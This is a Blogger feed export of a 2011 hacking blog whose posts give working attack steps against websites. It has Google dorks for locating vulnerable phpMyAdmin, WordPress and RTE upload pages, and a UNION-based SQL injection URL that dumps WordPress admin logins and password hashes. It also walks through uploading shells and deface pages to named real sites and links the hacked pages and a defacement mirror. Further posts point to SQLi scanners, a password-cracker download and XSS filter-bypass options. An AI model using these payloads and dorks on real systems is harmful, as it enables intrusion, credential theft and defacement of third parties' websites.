tag:blogger.com,1999:blog-88761652293238197272024-03-13T14:45:31.693-07:00Hacking HitcherUnknownnoreply@blogger.comBlogger105125tag:blogger.com,1999:blog-8876165229323819727.post-39947252907684873102011-11-17T11:29:00.000-08:002011-11-17T11:36:41.745-08:00phpmyadmin exploit<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghhDTksyD09mXHEl6cJDD0-ghWoxAP8pucOZNydNxVhI0rZW16eYxkwIGZiuxPsWRWr1b3ui-3xEDP-nzwqUkAk6CNm3KGGmKtDab1ClSMDYdCQX8-P9vuS8YR5QxCvHefSDNjXEhVhWNQ/s1600/phpmyadmin.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 142px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghhDTksyD09mXHEl6cJDD0-ghWoxAP8pucOZNydNxVhI0rZW16eYxkwIGZiuxPsWRWr1b3ui-3xEDP-nzwqUkAk6CNm3KGGmKtDab1ClSMDYdCQX8-P9vuS8YR5QxCvHefSDNjXEhVhWNQ/s200/phpmyadmin.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5676050911133915074" /></a><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "><h3 class="post-title entry-title" style="margin-top: 0px; padding-right: 0px; padding-left: 0px; color: rgb(43, 152, 212); font-size: 20px; font-family: Georgia; text-decoration: none; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; padding-top: 10px; padding-bottom: 0px; "><a href="http://www.devilscafe.in/2011/11/phpmyadmin-exploit.html" style="color: rgb(43, 126, 196); text-decoration: none; font-size: 20px; font-family: Georgia; margin-top: 0px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; padding-top: 10px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; ">phpmyadmin exploit</a></h3><div><br /></div></span><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; color: red; font-family: Arial, Helvetica, 
sans-serif; "><b>Dork : allinurl:index.php?db=information_schema</b></span><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b><br /></b></span><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b>Enter the above dork in Google; it will show more than 161,000 results</b></span><br /><b><span class="Apple-style-span" ><span class="Apple-style-span" style="line-height: 18px;">which will be vulnerable to this dork</span></span></b><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b><br /></b></span><br /><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b>This dork bypasses the admin username and password and takes you directly to the information schema tables to get data, and you can delete data too ......</b></span></span><div><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 13px; line-height: 18px; font-family: Arial, Helvetica, sans-serif; "><b><br /></b></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-30034274908784406592011-11-15T10:13:00.000-08:002011-11-15T10:29:05.227-08:00WordPress Exploit<div>Exploit WordPress "/easy-comment-uploads/upload-form.php".</div><div><br /></div><div>Find out sites from this dork </div><div><br /></div><div>Dork : "/easy-comment-uploads/upload-form.php"</div><div><br /></div><div><br /></div><div>*|_Exploit_|*</div><div><br /></div><div>http://[localhost]/[path]/easy-comment-uploads/upload-form.php</div><div>http://[localhost]/easy-comment-uploads/upload-form.php</div><div><br /></div><div>For example </div><div><a 
href="http://eleventigers.net/111/wp-content/plugins/easy-comment-uploads/upload-form.php">http://eleventigers.net/111/wp-content/plugins/easy-comment-uploads/upload-form.php</a></div><div><br /></div><div>File Extention [.txt],[.jpg],[gif],[bmp]</div><div><br /></div><div><br /></div><div>Preview Your Upload Page </div><div>In my case i upload hitcher1.jpg</div><div><a href="http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg">http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg</a></div><div><br /></div><div>site/wp-content/uploads/[years]/[month]/[yourshell]</div><div>example: site/wp-content/uploads/2011/06/404.php;.txt</div><div><br /></div><div>For example hacked links </div><div><br /></div><div><br /></div><div><br /></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8876165229323819727.post-54136956800160900482011-11-14T07:47:00.001-08:002011-11-14T08:14:20.818-08:00WordPress Blog Exploit<div><span class="Apple-style-span"><span 
class="Apple-style-span" style="line-height: 18px; ">First of all use Google Dork to find out such Sites </span></span></div><span class="Apple-style-span" style="color: rgb(255, 255, 255); font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(33, 33, 33); "><div><span class="Apple-style-span" style="color: rgb(255, 255, 255); font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(33, 33, 33); "><br /></span></div><div><span class="Apple-style-span" style="color: rgb(255, 255, 255); font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; background-color: rgb(33, 33, 33); "><br /></span></div>Dork: <span style="font-weight: bold; ">inurl:"fbconnect_action=myhome"</span><br /><br /><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiAASPVytviZLNR0tAxJx2bc3S4yABNGORhSj33tkRTUcMgFhmK3n37R2D7VVZr-wYDMvjbcNNxrxPH1Rx6U1b1WfW1ImEH8QqyMTPNkuVHOrgmxVv_XUcNrfsu3moOGsRpbYoQzhN7QFA/s400/untitled24.JPG" border="0" alt="[Image: untitled24.JPG]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />You will be get such info of admin on page<br /><br /><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho4g4VQYa1jPc6HY_9u4MwagYEWeKq1MX6fXj7CK29Xvs6FOgojdIiBZCi50IiFkJvbTu1xrk6zak54A1fL5pCyuTsXbgs7UdUG1ibM_vMg6-1u0ryDigmZzNF6PmbRtzNt9m-ITKala3W/s400/untitled22.JPG" border="0" alt="[Image: untitled22.JPG]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Just change this part of URL :<br /><span style="font-weight: bold; ">?fbconnect_action=myhome&userid=</span><br /><br />With This part of URL :<br /><span style="font-weight: bold; 
">?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--</span><br /><br /><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyUsRhEu1OQe5nZl42EWKNEJmKgZ3cKQd1EQC1f41zBDVjqqbUXn0qznLmlIUp2VzTUB3rzLcCjo7A9eYKggfWzLzI1sazRblc2y-RffvR14-jH4TXIEQZQ4tvSoxWOZ4NwOpgdrRedkIj/s400/untitled23.JPG" border="0" alt="[Image: untitled23.JPG]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Now You will be get Username and Password of Admin<br /><br />Than Just Encrypt Password In any MD5 Cracker </span><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><br /></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><br /></span></span><span class="Apple-style-span" style="color: rgb(34, 34, 34); font-family: arial, sans-serif; line-height: 15px; background-color: rgb(255, 255, 255); font-size: small; "><h3 class="r" style="font-size: medium; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; display: block; overflow-x: hidden; overflow-y: hidden; text-overflow: ellipsis; white-space: nowrap; "><br /></h3><div><br /></div><div><br /></div></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-38935096347445876932011-11-04T08:19:00.000-07:002011-11-04T09:00:48.528-07:00Rte Remote File Upload Vulnerability<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; background-color: rgb(255, 255, 255); "><b>Rte Remote File Upload Vulnerability found in many sites</b></span><div><span class="Apple-style-span"><b><br /></b></span><div><b><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; 
line-height: 18px; background-color: rgb(255, 255, 255); font-size: medium; ">To find which site's are Vulnerable </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">Use following G</span></b><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; line-height: 22px; ">oogle dorks for find such Sites</span></span><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; font-weight: bold; line-height: 22px; "><strong><br /></strong></span></span></div><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; font-weight: bold; line-height: 22px; "><strong>inurl:rte/my_documents/my_files</strong></span></span></div><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-size: 17px; font-weight: bold; line-height: 22px; "><strong>inurl:/my_documents/my_files/</strong></span><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "><br /></h3><h3 style="margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; ">These are Exploit </h3><ul style="font-size: 11px; line-height: 22px; "><li><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "><span style="color: rgb(0, 0, 0); ">site</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); ">example</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); 
">.com<strong>/rte/RTE_popup_file_atch.asp</strong></span></h3><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "></h3></li><li style="color: rgb(114, 114, 114); "><h3 style="margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; "><span style="color: rgb(0, 0, 0); ">siteexample.com<strong>/admin/RTE_popup_file_atch.asp</strong></span></h3></li></ul><h3 style="color: rgb(114, 114, 114); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; font-size: 17px; ">Hack a a site for Example.</h3><div><a href="http://www.jrf.org.tw/newjrf/index_new.asp">http://www.jrf.org.tw/newjrf/index_new.asp</a></div><div><br /></div></span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "> </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">Remove </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">/<a href="http://www.jrf.org.tw/newjrf/index_new.asp">index_new.asp</a> from it and put exploit link with it </span><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); ">like </span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><a href="http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp">http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp</a></span></span></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span">Now you will be get admin control area where you can upload your deface page and also your shell too in some cases like this </span></div><div><br /></div><div><span class="Apple-style-span"><br /></span></div><div><span 
class="Apple-style-span">Hacked link </span></div><div><span class="Apple-style-span"><a href="http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/FF1_hitcher.html">http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/FF1_hitcher.html</a></span></div><div><br /></div><div>Mirror</div><div><a href="http://www.zone-hack.com/defacements/?id=4365">http://www.zone-hack.com/defacements/?id=4365</a></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span" style="font-family: 'Trebuchet MS'; line-height: 18px; background-color: rgb(255, 255, 255); "><div><br /></div></span></div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-25601913644099005052011-10-22T14:48:00.000-07:002011-10-22T14:51:41.593-07:00Online SQLi Scanners<span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><p style="margin-top: 0px; padding-right: 15px; padding-left: 15px; "><span class="Apple-style-span" ><span class="Apple-style-span" style="line-height: 18px;">Online SQLi Scanners</span></span></p></span><span class="Apple-style-span" style="color: rgb(43, 152, 212); font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; background-color: rgb(255, 255, 255); "> <a href="http://scanner.drie88.tk/" style="text-decoration: underline; ">http://scanner.drie88.tk/</a></span><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><p style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; margin-top: 0px; padding-right: 15px; padding-left: 15px; "><span class="Apple-style-span" ><u><a href="http://wolfscps.com/gscanner.php">http://wolfscps.com/gscanner.php</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://cattuong.net/">http://cattuong.net/</a></u></span><br /><span class="Apple-style-span" ><u><a 
href="http://www.sunmagazin.com/tools/hack/SQLI-Scan/">http://www.sunmagazin.com/tools/hack/SQLI-Scan/</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://www.be007.gigfa.com/scanner/scanner.php">http://www.be007.gigfa.com/scanner/scanner.php</a></u></span><br /><span class="Apple-style-span" ><u><a href="http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/">http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/</a></u></span><br /><br /></p><div class="separator" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 18px; clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYfkhYAfY1TP7HHQk3JhWUF0WnzYVFBI5hchc5n6Fx8iGKalPCbli43t0vKdVWBZHVArG5g5nIGPld82JaO9VE2SEHErgCm8GOzxJUhTsXZOrSKs2_XIdLcMEfQw3oZj5CXYEKG8w0NE/s1600/sql.gif" imageanchor="1" style="color: rgb(43, 152, 212); text-decoration: none; margin-left: 1em; margin-right: 1em; "><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzYfkhYAfY1TP7HHQk3JhWUF0WnzYVFBI5hchc5n6Fx8iGKalPCbli43t0vKdVWBZHVArG5g5nIGPld82JaO9VE2SEHErgCm8GOzxJUhTsXZOrSKs2_XIdLcMEfQw3oZj5CXYEKG8w0NE/s400/sql.gif" width="400" style="border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-width: initial; border-color: initial; border-top-width: 6px; border-right-width: 6px; border-bottom-width: 6px; border-left-width: 6px; border-top-color: rgb(217, 217, 217); border-right-color: rgb(217, 217, 217); border-bottom-color: rgb(217, 217, 217); border-left-color: rgb(217, 217, 217); " /></a></div></span>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8876165229323819727.post-54445871674209848272011-10-22T14:35:00.000-07:002011-10-22T14:42:12.891-07:00Password Breaking Tools 2011 Link Updated<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: 
small; ">Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more</span><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; "><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; "><div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center; "><span style="font-size: small; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWO4kroGGI60a7VnSFwWuOgWvO9Yp9HcNuUgXvlnal0vk17WUHJMqBM74WXSKv3CAFgEehqgyLvA6-9ZBaSZxjzh0IcA6qnq86WrhlIxRYmTrqg8g2ChyphenhyphenqpVuwG_SYVE3dxAgY3Iebo4Ua/s1600/Password+Hacking+and+Breaking+Tools.jpg" style="color: rgb(43, 152, 212); text-decoration: underline; margin-left: 1em; margin-right: 1em; "><img alt="best hacking tools, password crackers, password hacking softwares" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWO4kroGGI60a7VnSFwWuOgWvO9Yp9HcNuUgXvlnal0vk17WUHJMqBM74WXSKv3CAFgEehqgyLvA6-9ZBaSZxjzh0IcA6qnq86WrhlIxRYmTrqg8g2ChyphenhyphenqpVuwG_SYVE3dxAgY3Iebo4Ua/s320/Password+Hacking+and+Breaking+Tools.jpg" width="320" style="border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-width: initial; border-color: initial; border-top-width: 6px; border-right-width: 6px; border-bottom-width: 6px; border-left-width: 6px; border-top-color: rgb(217, 217, 217); border-right-color: rgb(217, 217, 217); border-bottom-color: rgb(217, 217, 217); border-left-color: rgb(217, 217, 217); " /></a></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; 
"><span><br /></span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span><br /></span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>Following Password Breaking Tools:</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>1. PDF Password Remover</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>2. <span class="IL_AD" id="IL_AD1">Windows XP</span> Admin Password <span class="IL_AD" id="IL_AD10">Remover</span></span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>3. <span class="IL_AD" id="IL_AD9">Zip File</span> Password Cracker.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>4. SQL Password Remover</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>5. 
Microsoft Office Password Remover.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>6. Microsoft Windows Vista Password Remover.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>7. Rar File Password Cracker</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>8. Windows <span class="IL_AD" id="IL_AD11">Password Recovery</span> Kit</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>9. Password Changer.</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>10. 
Distributed File Password Recovery..</span></span></div><span style="font-size: small; "><span style="font-family: Arial, Helvetica, sans-serif; "></span></span><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span>and much more</span></span></div></span></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; ">Downloading link <a href="http://www.ziddu.com/download/14527424/Password_Cracker_Tools.rar.html">click here </a></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); font-size: small; "><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; "><div style="font-family: Arial, Helvetica, sans-serif; "><span style="font-size: small; "><span><br /></span></span></div></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-66894728096487289192011-09-04T01:53:00.000-07:002011-09-04T01:58:56.382-07:00Automatic Tool Pentesting XSS Attacks<span class="Apple-style-span" style="color: rgb(84, 84, 84); font-family: Arial, Verdana; font-size: 12px; background-color: rgb(255, 255, 255); "><h3 class="post-title entry-title" style="color: rgb(53, 53, 53); margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Georgia, 'Times New Roman Times', serif; font-size: 24px; line-height: 24px; ">
<br /></h3><div class="post-body entry-content" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 10px; padding-bottom: 5px; padding-left: 10px; font-family: Arial, Verdana; font-size: 12px; line-height: 20px; "><p></p><div style="border-top-left-radius: 15px 15px; border-top-right-radius: 15px 15px; border-bottom-right-radius: 15px 15px; border-bottom-left-radius: 15px 15px; border-top-color: rgb(104, 104, 104); border-right-color: rgb(104, 104, 104); border-bottom-color: rgb(104, 104, 104); border-left-color: rgb(104, 104, 104); border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; "><div id="element" style="height: 500px; overflow-x: auto; overflow-y: auto; "><b><u>Introduction</u></b>
<br />
<br /><b>Cross Site "Scripter"</b> is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
<br />
<br />It contains several options to try to bypass certain filters, and various special techniques of code injection.
<br />
<br /><b><u>Usage</u></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]</blockquote>
<br /><b><u>Options:</u></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--version<span class="Apple-tab-span" style="white-space: pre; "> </span>show program's version number and exit
<br />-h, --help<span class="Apple-tab-span" style="white-space: pre; "> </span>show this help message and exit
<br />-s, --statistics<span class="Apple-tab-span" style="white-space: pre; "> </span>show advanced statistics output results
<br />-v, --verbose<span class="Apple-tab-span" style="white-space: pre; "> </span>verbose (default: no)
<br />--gtk<span class="Apple-tab-span" style="white-space: pre; "> </span>launch XSSer GTK Interface</blockquote>
<br /><b><u>*Special Features*:</u></b>
<br />You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--imx=IMX<span class="Apple-tab-span" style="white-space: pre; "> </span>create a false image with XSS code embedded
<br />--fla=FLASH<span class="Apple-tab-span" style="white-space: pre; "> </span>create a false .swf file with XSS code embedded</blockquote>
<br /><b><u>*Select Target(s)*:</u></b>
<br />At least one of these options has to be specified to set the source to get target(s) urls from.
<br />You need to choose to run XSSer:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">-u URL, --url=URL<span class="Apple-tab-span" style="white-space: pre; "> </span>Enter target(s) to audit
<br />-i READFILE<span class="Apple-tab-span" style="white-space: pre; "> </span>Read target URLs from a file
<br />-d DORK<span class="Apple-tab-span" style="white-space: pre; "> </span>Process search engine dork results as target urls
<br />--De=DORK_ENGINE<span class="Apple-tab-span" style="white-space: pre; "> </span>Search engine to use for dorking (bing, altavista,
<br />yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
<br />See dork.py file to check for available engines)</blockquote>
<br /><b><u>*Select type of HTTP/HTTPS Connection(s)*:</u></b>
<br />These options can be used to specify which parameter(s) we want to use like payload to inject code.
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">-g GETDATA<span class="Apple-tab-span" style="white-space: pre; "> </span>Enter payload to audit using GET. (ex: '/menu.php?q=')
<br />-p POSTDATA<span class="Apple-tab-span" style="white-space: pre; "> </span>Enter payload to audit using POST. (ex: 'foo=1&bar=')
<br />-c CRAWLING<span class="Apple-tab-span" style="white-space: pre; "> </span>Number of urls to crawl on target(s): 1-99999
<br />--Cw=CRAWLING_WIDTH<span class="Apple-tab-span" style="white-space: pre; "> </span>Deeping level of crawler: 1-5
<br />--Cl<span class="Apple-tab-span" style="white-space: pre; "> </span>Crawl only local target(s) urls (default TRUE)</blockquote>
<br /><b><u>*Configure Request(s)*:</u></b>
<br />These options can be used to specify how to connect to target(s) payload(s).
<br />You can select multiple:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--cookie=COOKIE<span class="Apple-tab-span" style="white-space: pre; "> </span>Change your HTTP Cookie header
<br />--user-agent=AGENT<span class="Apple-tab-span" style="white-space: pre; "> </span>Change your HTTP User-Agent header (default SPOOFED)
<br />--referer=REFERER<span class="Apple-tab-span" style="white-space: pre; "> </span>Use another HTTP Referer header (default NONE)
<br />--headers=HEADERS<span class="Apple-tab-span" style="white-space: pre; "> </span>Extra HTTP headers newline separated
<br />--auth-type=ATYPE<span class="Apple-tab-span" style="white-space: pre; "> </span>HTTP Authentication type (value Basic or Digest)
<br />--auth-cred=ACRED<span class="Apple-tab-span" style="white-space: pre; "> </span>HTTP Authentication credentials (value name:password)
<br />--proxy=PROXY<span class="Apple-tab-span" style="white-space: pre; "> </span>Use proxy server (tor: http://localhost:8118)
<br />--timeout=TIMEOUT<span class="Apple-tab-span" style="white-space: pre; "> </span>Select your Timeout (default 30)
<br />--delay=DELAY<span class="Apple-tab-span" style="white-space: pre; "> </span>Delay in seconds between each HTTP request (default 8)
<br />--threads=THREADS<span class="Apple-tab-span" style="white-space: pre; "> </span>Maximum number of concurrent HTTP requests (default 5)
<br />--retries=RETRIES<span class="Apple-tab-span" style="white-space: pre; "> </span>Retries when the connection timeouts (default 3)</blockquote>
<br /><b><u>*Select Vector(s)*:</u></b>
<br />These options can be used to specify a XSS vector source code to inject in each payload.
<br />Important, if you don't want to try to inject a common XSS vector, used by default.
<br />Choose only one option:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--payload=SCRIPT<span class="Apple-tab-span" style="white-space: pre; "> </span>OWN - Insert your XSS construction -manually-
<br />--auto<span class="Apple-tab-span" style="white-space: pre; "> </span>AUTO - Insert XSSer 'reported' vectors from file</blockquote>
<br /><b><u>*Select Bypasser(s)*:</u></b>
<br />These options encode the selected vector(s) to try to bypass the anti-XSS filters in the target's code and some IPS rules, if the target uses them.
<br />They can also be combined with other techniques to provide encoding:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Str<span class="Apple-tab-span" style="white-space: pre; "> </span>Use method String.FromCharCode()
<br />--Une<span class="Apple-tab-span" style="white-space: pre; "> </span>Use function Unescape()
<br />--Mix<span class="Apple-tab-span" style="white-space: pre; "> </span>Mix String.FromCharCode() and Unescape()
<br />--Dec<span class="Apple-tab-span" style="white-space: pre; "> </span>Use Decimal encoding
<br />--Hex<span class="Apple-tab-span" style="white-space: pre; "> </span>Use Hexadecimal encoding
<br />--Hes<span class="Apple-tab-span" style="white-space: pre; "> </span>Use Hexadecimal encoding, with semicolons
<br />--Dwo<span class="Apple-tab-span" style="white-space: pre; "> </span>Encode vectors IP addresses in DWORD
<br />--Doo<span class="Apple-tab-span" style="white-space: pre; "> </span>Encode vectors IP addresses in Octal
<br />--Cem<span class="Apple-tab-span" style="white-space: pre; "> </span>Try -manually- different Character Encoding mutations</blockquote>(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
